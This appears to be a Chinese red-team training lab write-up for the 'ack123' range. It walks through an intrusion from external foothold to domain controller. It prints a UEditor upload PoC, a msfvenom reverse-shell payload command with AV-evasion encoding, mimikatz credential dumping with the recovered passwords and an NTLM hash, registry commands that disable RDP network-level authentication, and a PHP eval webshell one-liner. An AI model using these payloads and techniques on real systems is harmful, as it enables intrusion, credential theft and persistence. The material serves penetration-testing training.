九月红队考核ack123靶场第二篇

暗月九月红队考核ack123靶场第二篇

暗月渗透测试培训出师靶场的第二篇

九月出师人数共七人

共七篇文章 目前第二篇

1.站库分离 外网打点
2.过360全家桶
3.过windwos defender
4.过火绒
5.内网漫游
6.多层网络渗透
7.横向渗透
8.jwt token密钥破解
9.权限提升
10.域渗透
11.phpmyadmin写shell
12.sqlserver 提权

每三个月一次考核，每个项目根据当前流行的技术进行适当的调整。
项目综合考核渗透测试能力，培养单兵作战的安全选手。

需要渗透测试培训 欢迎添加好友咨询

前台登陆看到/member

猜是cms去下源码

这边访问/admin进入后台登陆页面

注册hello 123456

权限很低只能看一些信息 无法创建模板

抓包发现cookies参数没有加密在注册 admin账户时发现

admincook=admin可能是鉴权参数

改cookies垂直越权管理员

发现ueditor

ueditor1.43 文件上传poc

<form action="http://www.ackmoon.com/Admin/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"method="POST"> <p>shelladdr: <inputtype="text"name="source[]"/></p><inputtype="submit"value="Submit"/></form>

官网下载源码得知文件controller.ashx路径

/admin/net/controller.ashx

制作马上传vps

edge

冰蝎连

tasklist发现360全家桶

上马连cs

权限是iis需要提权

netstate-ano 发现数据库服务器192.168.22.133:1433

想法是上线到msf上看看哪些能提权

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.122 LPORT=2333 -ex86/shikata_ga_nai -i 15 -f csharp -o payload.txt

同样的shellcode换成msf的一直免杀不了

换个思路

官网下载源码找到数据库配置文件位置 找到配置文件

serid=sa;[email protected];initial catalog=DemoHdhCms;datasource=192.168.22.133

发现内网web2

哥斯拉内存加载提权上线

privilege::debugsekurlsa::logonpasswords

administrator

QWEasd.123

192.168.22.151:5985192.168.22.151:3389192.168.22.151:999192.168.22.151:139192.168.22.151:135192.168.22.151:80192.168.22.135:5985192.168.22.151:21(220 Microsoft FTP Service)192.168.22.135:139192.168.22.135:135192.168.22.135:80192.168.22.133:5985192.168.22.133:139192.168.22.133:135192.168.22.133:80192.168.22.1:5040192.168.22.1:912192.168.22.1:902192.168.22.1:139192.168.22.1:135192.168.22.133:445192.168.22.135:445192.168.22.151:445(platform: 500 version: 6.3 name: 12SERVER-WEB1 domain: WORKGROUP)

登陆3389

报错密码过期

查了一下密码过期并不是真的过期 可能是 开启了开启仅允许运行使用网络级别身份验证的远程桌面的计算机连接

找到注册表位置

下方为关闭仅允许运行使用网络级别身份验证的远程桌面的计算机连接

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-TCP" /v UserAuthentication /t REG_DWORD/d "0" /f

下方为开启仅允许运行使用网络级别身份验证的远程桌面的计算机连接

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-TCP" /v UserAuthentication /t REG_DWORD/d "1" /f

登陆关闭360

换一种方式连接数据库这里用 webshell代理proxychains进内网通过impack工具包连接mssql

开启xpcmdshell成功但执行命令 报错5

开启xpcmdshell执行命令报错5

访问

192.168.22.135web

jwt

jwtcrack跑不出加密秘钥

C:/Hws.com/HwsHostMaster/wwwroot/www.ackmoon.com/web/upfiles/image/20210902/active_desktop_launcher.exe

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC8xMC4xMC4xLjEzNSIsImF1ZCI6Imh0dHA6XC9cLzEwLjEwLjEuMTM1IiwiaWF0IjoxNjMwODQ0MjY0LCJuYmYiOjE2MzA4NDQyNzQsImV4cCI6MTYzMDg0NDg2NCwiZGF0YSI6eyJ1c2VyaWQiOjEsInVzZXJuYW1lIjoiZGVtbyJ9fQ.3cVS7_s0ncvlhm4N_0PVkc7ysw0a43Z2Rk9yDmmisD0

换了个工具继续跑 jwt-tools-master

登陆之后没有功能点可供shell

Qweasdzxc5

目录扫描发现报错页面得知为phpstudy_pro

phpstudypro

有个phpmyadmin4.8.5

root和jwt跑出的key登陆

尝试日志写一句话

select "<?php eval($_POST['wh04m1']);?>"

蚁剑代理连接system权限

ackmoon:1008:aad3b435b51404eeaad3b435b51404ee:b9cf8253d9c3f9aa49430a541be29c1c

蚁剑上传有问题换冰蝎上传正向上线

定位域控查找域管 导出域管hash密码为QWEasd.999

QWEasd.999

尝试了一大堆拿域控的方法未果

无奈上传ladon爆smb

三板斧

失败正向连不上 可能有墙

psexec上线吧还是

迁移域管导域内hash

还是三板斧

本公众号长期更新安全类技术文章 欢迎关注和转发

相关推荐: 上车出发！E安全带你逛“互联网之光”博览会

介绍      由国家网信办和浙江省政府共同举办的2021年世界互联网大会乌镇峰会，将于9月26日至28日在浙江乌镇召开。本届博览会以“迈向数字文明新时代——携手构建网络空间命运共同体”为主题。     &nb…